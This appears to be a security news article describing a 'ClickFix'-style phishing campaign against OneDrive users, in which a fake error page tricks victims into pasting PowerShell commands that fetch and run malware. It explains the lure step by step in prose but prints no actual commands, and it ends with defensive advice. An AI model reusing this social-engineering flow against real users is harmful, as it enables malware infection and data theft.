A new phishing campaign targeting Microsoft OneDrive users has been observed, employing social engineering tactics to trick victims into executing malicious PowerShell scripts. The campaign exploits users’ urgency to access files and their trust in legitimate-seeming software interfaces.
OneDrive Phishing Campaign Attack Sequence
Researchers from Trellix observed that the campaign begins with an email containing an .html file, which, when opened, displays an image designed to create a sense of urgency about accessing a document. The image simulates a Microsoft OneDrive page displaying a file named “Reports.pdf” and a window titled “Error 0x8004de86” with an error message claiming that the “OneDrive” cloud service needs to be updated.
Two buttons, “Details” and “How to fix,” are presented, with the latter triggering a function call and loading secondary instructions. This combination of technical jargon and urgent error messages is a classic social engineering tactic, designed to manipulate the user’s emotions and prompt hasty action.
The attack sequence unfolds as follows: the user is instructed to click on a button that purportedly explains how to fix a DNS issue, in the process compromising their system. The user is then asked to open the Quick Link menu, access the Windows PowerShell terminal and paste the malicious commands for execution as a supposed measure for implementing the OneDrive cloud service update. The command downloads an archive file, extracts its contents, and executes a script using AutoIt3.exe.
Ultimately, the attack displays a success message, claiming that the operation has been completed.
Global Reach and Enterprise Implications
The campaign has affected users worldwide, with significant activity detected in the United States, India, and the United Kingdom. For businesses, this attack poses a serious threat. A single compromised employee could potentially lead to widespread network infiltration, data breaches, and financial losses.
To combat such attacks, organizations must:
- Implement robust employee training programs focused on recognizing phishing attempts.
- Enforce strict security protocols, including email filtering and attachment scanning.
- Regularly update and patch systems to close potential vulnerabilities.
- Foster a culture of cybersecurity awareness throughout the organization.
Campaigns of this nature that attempt to trick users into executing malicious PowerShell scripts – often contain malware such as remote access Trojans (RATs) and infostealers such as DarkGate, Lumma and Vidar – have been commonly dubbed by security researchers as ‘ClickFix‘ attacks or ‘ClearFake.’